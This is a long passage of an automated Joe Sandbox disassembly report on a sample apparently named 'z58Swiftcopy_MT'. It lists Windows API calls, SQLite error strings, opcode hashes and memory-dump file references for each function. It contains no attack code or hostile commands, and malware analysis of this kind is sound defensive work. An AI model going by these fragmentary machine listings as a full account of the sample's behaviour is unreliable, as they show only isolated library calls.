                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                      • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                                      • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFilefreememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2507021081-0
                                                                                                                                                                                                                                      • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417544
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00417562
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                                                                                                      • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                                                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                      • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                      • String ID: General
                                                                                                                                                                                                                                      • API String ID: 999786162-26480598
                                                                                                                                                                                                                                      • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                      • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                                      • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                                                                                                      • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
